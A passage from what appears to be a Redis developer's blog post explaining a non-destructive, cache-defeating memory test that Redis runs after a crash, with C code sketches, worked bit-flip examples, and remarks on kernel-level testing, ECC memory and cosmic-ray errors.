         * of each line. */
        start = p;
        p = strchr(p,'-');
        if (!p) continue;
        *p++ = '\0';
        end = p;
        p = strchr(p,' ');
        if (!p) continue;
        *p++ = '\0';

        /* Skip the stack (testing it would crash the tester itself)
         * and the special kernel maps. */
        if (strstr(p,"stack") ||
            strstr(p,"vdso") ||
            strstr(p,"vsyscall")) continue;
        /* Keep only anonymous (device 00:00) read-write maps. */
        if (!strstr(p,"00:00")) continue;
        if (!strstr(p,"rw")) continue;

        start_addr = strtoul(start,NULL,16);
        end_addr = strtoul(end,NULL,16);
        size = end_addr-start_addr;

        start_vect[regions] = start_addr;
        size_vect[regions] = size;
        printf("Testing %lx %lu\n", start_vect[regions], size_vect[regions]);
        regions++;
    }

    /* ... code to actually test the found memory regions ... */

    /* NOTE: It is very important to close the file descriptor only now
     * because closing it before may result into unmapping of some memory
     * region that we are testing. */
    fclose(fp);
}

CPU cache
===

The other problem we have is the CPU cache. If we try to write something to a given memory address, and read it back to check if it is ok, we are actually only stressing the CPU cache and never hitting the memory that is supposed to be tested.

Actually writing a memory test that bypasses the CPU cache, without the need to resort to CPU specific tricks (like memory type range registers), is easy:

1) Fill all the addressable memory from the first to the last with the pattern you are testing.
2) Check all the addressable memory, from the first to the last, to see if the pattern can be read back as expected.

Because we do it in two passes, as long as the size of the memory we are testing is larger than the CPU cache, we should be able to test the memory in a reliable way.
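In code, the destructive two-pass test boils down to something like this (a simplified sketch for illustration, not code taken from Redis; the memtest_destructive name is mine):

#include <stddef.h>

/* Destructive two-pass test: fill the whole region first, verify it
 * later. Because every location is written before any location is
 * read back, a region larger than the CPU cache cannot be served
 * entirely from the cache during the verification pass.
 * Returns 1 if an error is detected, 0 otherwise. */
int memtest_destructive(unsigned long *m, size_t nwords, unsigned long pattern) {
    size_t i;

    for (i = 0; i < nwords; i++) m[i] = pattern;  /* pass 1: fill */
    for (i = 0; i < nwords; i++)                  /* pass 2: verify */
        if (m[i] != pattern) return 1;
    return 0;
}

Running it twice, with a pattern and its complement (for instance 0xaa... and 0x55...), tests every bit in both states.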

But there is a problem: this test destroys the content of the memory, which is not acceptable in our case. Remember that we want to be able to provide a meaningful core dump after the crash, if needed.

On the other hand, writing a memory test that does not destroy the memory content, but is not able to bypass the cache, is also easy: for each location, save its value on the stack, test the location by writing patterns and reading them back, and finally restore the original value. However this test is completely useless as long as we are not able to disable the CPU cache.

How to write a memory test that:

A) Is able to bypass the cache.
B) Does not destroy the memory content.
C) Is able, at least, to test every memory bit in the two possible states.

Well, that's what I asked myself during the past weekend, and I found a simple solution that works as expected (as tested on a computer with broken memory; thanks Kosma! See the credits at the end of the post).

This is the algorithm:

1) Take a CRC64 checksum of the whole memory.
2) Invert the content of every location from the first to the last (With "invert" I mean, bitwise complement, so that every 1 is turned into 0, and every 0 turned into 1).
3) Swap every adjacent location content. So I swap the content at addresses 0 and 1, 2 and 3, ... and so forth.
4) Swap again (step 3).
5) Invert again (step 2).
6) Take a CRC64 checksum of the whole memory.
7) Swap again.
8) Swap again.
9) Take a CRC64 checksum of the whole memory again.

If the CRC64 checksums obtained at steps 1, 6 and 9 are not all the same, there is some memory error.

Now let's check why this is supposed to work. It is trivial to see that, if the memory is working as expected, after these steps I get back the original memory content, since I swap four times and invert twice. But what happens if there are memory errors?

Let's do a test considering memory locations of just two bits each, for simplicity. So I have something like:

01|11|11|00
      |
      +----- this bit is broken and is always set to 1.

(step 1: CRC64)
After step 2: 10|00|10|11 (note that the broken bit is still 1 instead of 0)
After step 3: 00|10|11|10 (adjacent locations swapped)
After step 4: 10|00|10|11 (swapped again)
After step 5: 01|11|11|00 (inverted again, so far, no errors detected)
(step 6: CRC64)
After step 7: 11|01|10|11
After step 8: 01|11|11|10 (error!)
(step 9: CRC64)

The CRC64 obtained at step 9 will differ.
Now let's check the case of a bit always set to 0.

01|11|01|00
      |
      +----- this bit is broken and is always set to 0.

(step 1: CRC64)
After step 2: 10|00|00|11 (invert)
After step 3: 00|10|01|00 (swap)
After step 4: 10|00|00|01 (swap)
After step 5: 01|11|01|10 (invert)
(step 6: CRC64)
After step 7: 11|01|00|01 (swap)
After step 8: 01|11|01|00 (swap)
(step 9: CRC64)

This time it is the CRC64 obtained at step 6 that will differ.
You can check what happens if you flip bits in the adjacent location, but either at step 6 or at step 9 you should always be able to see a different checksum.

So basically this test does two things: first it amplifies the error using an adjacent location as a helper, then it uses checksums to detect it. The steps are always performed as "read + write" operations acting sequentially from the first to the last memory location, to defeat the CPU cache as much as possible.
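Condensed in code, the whole test looks like the sketch below. All the names here are mine, and I use FNV-1a in place of CRC64 just to keep the example self-contained; any good checksum works for the purpose of the steps described above:

#include <stdint.h>
#include <stddef.h>

/* Stand-in checksum for CRC64 (FNV-1a, 64 bit). */
static uint64_t fnv1a64(const unsigned char *p, size_t len) {
    uint64_t h = 14695981039346656037ULL;  /* FNV offset basis */
    while (len--) {
        h ^= *p++;
        h *= 1099511628211ULL;             /* FNV prime */
    }
    return h;
}

/* Steps 2 and 5: bitwise-complement every word, first to last. */
static void invert_all(unsigned long *m, size_t n) {
    size_t i;
    for (i = 0; i < n; i++) m[i] = ~m[i];
}

/* Steps 3, 4, 7 and 8: swap every pair of adjacent words
 * (for simplicity this sketch assumes an even number of words). */
static void swap_adjacent(unsigned long *m, size_t n) {
    size_t i;
    for (i = 0; i + 1 < n; i += 2) {
        unsigned long t = m[i];
        m[i] = m[i+1];
        m[i+1] = t;
    }
}

/* Returns 1 if a memory error is detected, 0 otherwise. If the memory
 * works correctly, the region is left exactly as it was found. */
int memtest_preserving(unsigned long *m, size_t bytes) {
    size_t n = bytes / sizeof(unsigned long);
    uint64_t crc1, crc2, crc3;

    crc1 = fnv1a64((unsigned char*)m, bytes);  /* step 1 */
    invert_all(m, n);                          /* step 2 */
    swap_adjacent(m, n);                       /* step 3 */
    swap_adjacent(m, n);                       /* step 4 */
    invert_all(m, n);                          /* step 5 */
    crc2 = fnv1a64((unsigned char*)m, bytes);  /* step 6 */
    swap_adjacent(m, n);                       /* step 7 */
    swap_adjacent(m, n);                       /* step 8 */
    crc3 = fnv1a64((unsigned char*)m, bytes);  /* step 9 */

    return crc1 != crc2 || crc1 != crc3;
}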

You can find the code implementing this in the "memcheck-on-crash" branch on github, "debug.c" file:

https://github.com/antirez/redis/blob/memtest-on-crash/src/debug.c#L669

The kernel could do it better
===

After dealing with many crash reports that are actually due to memory errors, I'm starting to think that kernels are missing an incredible opportunity to make computers more reliable.

What Redis is doing could be done incrementally, a few pages per second, by the kernel with no impact on actual performance. And the kernel is in a particularly good position:

1) It could easily detect the error, bypassing the cache.
2) It could perform more interesting value-retention tests, writing patterns to pages that will be reused much later in time, and checking if the pattern matches before the page is reused.
3) The error could be logged in the system logs, making the user aware before a problem happens.
4) It could exclude the broken page from being used again, resulting in safer computing.

I hope to see something like that in the Linux kernel in the future.

The life of a lonely cosmic ray
===

A bit flipping at random is not a problem related solely to broken memory. Perfectly healthy memory is also subject, with a small probability, to bit flipping because of cosmic rays.

We are talking, of course, about non error correcting memory. The more costly ECC memory can correct single-bit errors and can detect two-bit errors, halting the system. However many (most?) servers are currently using non-ECC memory, and it is not clear if Amazon EC2 and other cloud providers are using ECC memory or not (in my opinion it is not ok that this information is not clearly available, given the cost of services like EC2 and the possible implications of not using ECC memory).

According to a few sources, including IBM, Intel and Corsair, a computer with a few GB of non-ECC memory is likely to incur *several* memory errors every year.
Of course you can't detect the error with a memory test if the bit flipping was caused by a cosmic ray hitting your memory, so to cut a long story short:

Users reporting isolated, impossible-to-understand and impossible-to-reproduce crashes on non-ECC memory can't be taken as proof that there is a bug, even if the fast on-crash memory test passes, even if the more accurate redis-server --test-memory passes, and even if they run memtest86 for several days after the event.

Anyway, not every flipped bit is going to trigger a crash, because as somebody on Stack Overflow said:

"Most of the memory contains data, where the flip won't be that visiblp"

The bytes representing 'p' and 'e' are not just one bit away, but I find the sentence fun anyway.

Credits
===

A big Thank You to Kosma Moczek, who reported how my initial approach was not working due to the CPU cache, and donated ssh access to a fast computer with a single-bit memory error.
http://antirez.com/news/43